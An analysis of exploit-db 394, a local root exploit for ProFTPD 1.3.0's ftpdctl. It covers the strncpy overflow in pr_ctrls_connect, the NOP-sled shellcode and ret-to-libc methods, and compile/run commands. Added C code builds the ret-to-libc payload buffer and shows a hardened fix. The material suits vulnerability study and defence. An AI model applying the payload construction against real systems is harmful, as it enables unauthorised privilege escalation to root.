Analysis of the ProFTPD local pr_ctrls_connect vulnerability (ftpdctl) and its attack code

Source: Internet
Author: User

Attack code URL: http://www.exploit-db.com/exploits/394/


1. Running environment:
1. ProFTPD 1.3.0/1.3.0a
2. ProFTPD must be compiled with the --enable-ctrls option:
./configure --enable-ctrls
2. Running parameters:
root@kali:~# gcc 394.c -o 394
root@kali:~# ./394 -s <option> [-p <option_path>] [-o <option_offset>]
The value after -s selects one of two attack methods, 1 or 2. Method 1 places the shellcode in the environment of the target process and returns into it; method 2 uses ret-to-libc.
Note: In a return-to-libc attack, the saved return address on the stack is overwritten with the address of an existing function (here system() in libc), and part of the stack is overwritten to supply that function's arguments. The attacker therefore calls code that is already in the process without injecting any of their own.
The -p (path to ftpdctl) and -o (offset) parameters are optional tuning knobs for the attack code and are not needed for the analysis below.
3. Code Analysis
The command analysed below is root@kali:~# ./394 -s 1
3.1 analysis program parameters

Line 236 of 394.c parses the command-line parameters with getopt(int argc, char * const argv[], const char *optstring). argc and argv are the parameter count and contents passed to main(); optstring lists the option letters to be processed, and a letter followed by a colon ":" takes an argument, which getopt makes available through the global variable optarg. The program then handles each option in turn. Since only -s is used in the end, the analysis focuses on that option.
When getopt reaches -s, the colon after s in optstring makes optarg point to the argument that follows -s, here 1. Line 246 assigns that value to the variable wybor for later use.

3.2 determine the validity of parameters
394.c implements only two attack methods, so the value after -s is limited to 1 or 2; any other value is treated as invalid and the program exits immediately.

The path variable holds the absolute path of the vulnerable program; its default is /usr/local/bin/ftpdctl. ftpdctl, the ProFTPD control client, calls pr_ctrls_connect() in ctrls.c, and a strncpy() inside that function is the buffer overflow point of this vulnerability. Line 267 of 394.c opens the file with fopen() to check that a program exists at path.

3.3 construct overflow data and perform attacks
The final attack statement, at lines 298 and 324, is execle(path, path, "-s", buf, 0, sh);
int execle(const char *path, const char *arg, ..., char * const envp[]);
execle() replaces the current process image with a new one. path names the program to start, including its directory; the arg list is the argument vector of the new program, whose first element is conventionally the command name; envp is the environment handed to the new process.
buf holds the overflow data. Besides a large amount of filler, the important content is the return address that eventually leads to /bin/sh: once the buffer overflows, control is redirected there and arbitrary commands can be run.
Two variables are involved in constructing the overflow data: buf[229] and sh[2]. Since the value after -s (1 or 2) selects the method, the two methods are described separately.
Method 1 (wybor = 1): apart from the first two bytes of buf, "/A", the other 227 bytes are repeated copies of the return address, which points at the shellcode placed in the environment (described next).

envp[] (sh[2]) is padded with 0x90 (NOP) bytes and the prepared shellcode is written at the end, so a return address landing anywhere in the padding slides into the shellcode. The shellcode performs setuid(0), setgid(0), executes /bin/sh, and then exit(0).

Method 2 (wybor = 2) uses ret-to-libc. In buf, the first byte is '/', and the last three 4-byte words are, in order, the address of system() in libc (LIBC_SYSTEM), the address system() will return to (LIBC_NEXT), and the address of the string "/bin/sh". The bytes in between are filled with 0x41 ('A').

envp[] is padded with a filler character and the string "/bin/sh" is written at its end; that string is what the third word in buf refers to.
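The method-2 layout above, written out as an added example (this is not code from 394.c or ProFTPD). It assumes the 32-bit little-endian x86 target the exploit was written for, and the three addresses passed in are placeholders, not real libc locations. It also makes one practitioner's caveat visible: buf reaches ftpdctl as an argv string and ctrls.c bounds its copy with strlen(socket_file), so any zero byte inside one of the three addresses truncates the payload before it ever reaches sun_path.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Store a 32-bit value little-endian, as on the 32-bit x86 targets the
 * exploit was written for (assumption: 32-bit addresses). */
static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

/* Lay out the method-2 buffer:
 *   '/' | pad_len bytes of 0x41 | system() | return-after-system | &"/bin/sh" | NUL
 * The leading '/' keeps the string looking like a socket path. Returns the
 * payload length excluding the terminating NUL, or 0 if out is too small. */
size_t build_ret2libc_payload(uint8_t *out, size_t out_len, size_t pad_len,
                              uint32_t libc_system, uint32_t libc_next,
                              uint32_t binsh_addr)
{
    size_t need = 1 + pad_len + 3 * 4 + 1;
    if (out_len < need)
        return 0;
    out[0] = '/';
    memset(out + 1, 0x41, pad_len);
    put_le32(out + 1 + pad_len, libc_system);
    put_le32(out + 1 + pad_len + 4, libc_next);
    put_le32(out + 1 + pad_len + 8, binsh_addr);
    out[need - 1] = '\0';
    return need - 1;
}

/* The buffer travels to ftpdctl as an argv string, and ctrls.c bounds its
 * strncpy() with strlen(socket_file). Both stop at the first zero byte, so
 * this is how much of the payload actually lands in sun_path. */
size_t bytes_reaching_sun_path(const uint8_t *payload)
{
    return strlen((const char *)payload);
}

/* Build a 229-byte buffer (the size of buf in 394.c) with the given
 * addresses and report how many bytes would survive the copy. Callers pass
 * placeholder addresses; none of them are real libc locations. */
size_t demo_ret2libc(uint32_t libc_system, uint32_t libc_next, uint32_t binsh_addr)
{
    uint8_t buf[229];
    size_t pad_len = sizeof(buf) - 1 - 3 * 4 - 1; /* 215 filler bytes */
    if (build_ret2libc_payload(buf, sizeof(buf), pad_len,
                               libc_system, libc_next, binsh_addr) == 0)
        return 0;
    return bytes_reaching_sun_path(buf);
}
```

With three addresses that contain no zero byte, all 228 payload bytes reach the target; if, say, the second word were 0xb7ec0020, the copy would stop after its first byte and the two remaining addresses would never be written. The same constraint applies to the method-1 buffer, whose 227 repeated return addresses must likewise be free of zero bytes.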
3.4 Root cause of the vulnerability
ftpdctl must establish a local socket connection to the server for inter-process communication. To do so, ftpdctl.c calls pr_ctrls_connect(char *socket_file), which is defined in ctrls.c.
pr_ctrls_connect() creates a stream socket of type AF_UNIX and connects it to the server. The local socket address used for the connection is ctrl_sock, a struct sockaddr_un with two members: sun_family, the protocol family, set to AF_UNIX for local inter-process communication, and sun_path, the path of the socket file. socket_file is copied into sun_path, and the copy is done with a strncpy() whose length bound does not come from the destination. The write, at line 923 of ctrls.c, is
strncpy(ctrl_sock.sun_path, socket_file, strlen(socket_file));
The third argument is the length of the source, so the call copies the whole of socket_file however long it is: the strncpy() looks bounded but provides no bound at all, and data of any length is written into a destination of sizeof(ctrl_sock.sun_path) bytes. ctrl_sock is a local variable of pr_ctrls_connect(), so it lives in the function's stack frame, which also holds the saved registers and the return address of the call. That is what makes the stack buffer overflow possible. As the comments in the 394.c source note, the attacker controls the length of socket_file and therefore controls the overflow.
394.c exploits exactly this: it builds over-long data containing the chosen return address and passes it to ftpdctl through -s in place of a normal socket_file path. When ctrls.c executes the strncpy(), the over-long data overflows ctrl_sock and overwrites the saved return address, and when pr_ctrls_connect() returns, control is transferred to the shellcode (method 1) or to system("/bin/sh") (method 2).
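The buggy bound and a hardened replacement side by side, as an added example (not ProFTPD's own fix and not code from 394.c). The over-long input is constructed here to mirror the exploit's 229-byte buf; the capacity of sun_path is taken from the platform's struct sockaddr_un (108 bytes on Linux), and the vulnerable strncpy() is reasoned about arithmetically rather than executed, so the example runs without corrupting its own stack.

```c
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>

/* Constructed input: a leading '/' followed by far more bytes than sun_path
 * can hold, the shape of the exploit's buf. */
static void make_long_path(char *out, size_t len)
{
    memset(out, 'A', len - 1);
    out[0] = '/';
    out[len - 1] = '\0';
}

/* How many bytes the original call, strncpy(dst, src, strlen(src)), would
 * write past the end of sun_path. Its "n" argument is derived from the
 * source, so it never limits the copy. Pure arithmetic; nothing is written. */
size_t bytes_past_sun_path(const char *socket_file)
{
    size_t n = strlen(socket_file);
    size_t cap = sizeof(((struct sockaddr_un *)0)->sun_path);
    return n > cap ? n - cap : 0;
}

/* Hardened replacement (added example, not ProFTPD's fix): bound the copy
 * by the destination and insist on room for the terminating NUL, which
 * connect() on an AF_UNIX path expects. Returns the address length to pass
 * to connect(), or -1 if the path is empty or too long. */
int ctrls_fill_sockaddr(struct sockaddr_un *addr, const char *socket_file)
{
    size_t n = strlen(socket_file);
    if (n == 0 || n >= sizeof(addr->sun_path))
        return -1;
    memset(addr, 0, sizeof(*addr));
    addr->sun_family = AF_UNIX;
    memcpy(addr->sun_path, socket_file, n + 1); /* includes the NUL */
    return (int)(offsetof(struct sockaddr_un, sun_path) + n + 1);
}

/* Feed the constructed over-long path to both: the hardened setter must
 * refuse it, and the original bound would have spilled this many bytes
 * beyond sun_path into the rest of the frame. */
size_t demo_overflow_size(void)
{
    char path[229];
    struct sockaddr_un addr;
    make_long_path(path, sizeof(path));
    if (ctrls_fill_sockaddr(&addr, path) != -1)
        return 0; /* would indicate a bug in the hardened version */
    return bytes_past_sun_path(path);
}

/* A normal socket path is accepted and yields a usable address length. */
int demo_valid_path(void)
{
    struct sockaddr_un addr;
    return ctrls_fill_sockaddr(&addr, "/tmp/proftpd.sock");
}
```

The check that was missing is the comparison against sizeof(addr->sun_path); with strlen(src) as the bound, strncpy() is no safer than strcpy(). Note also that the hardened version rejects a path of exactly sizeof(sun_path) bytes: Linux would still accept an unterminated sun_path, but requiring the NUL keeps the address portable and leaves nothing for a later strlen() on sun_path to walk past.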
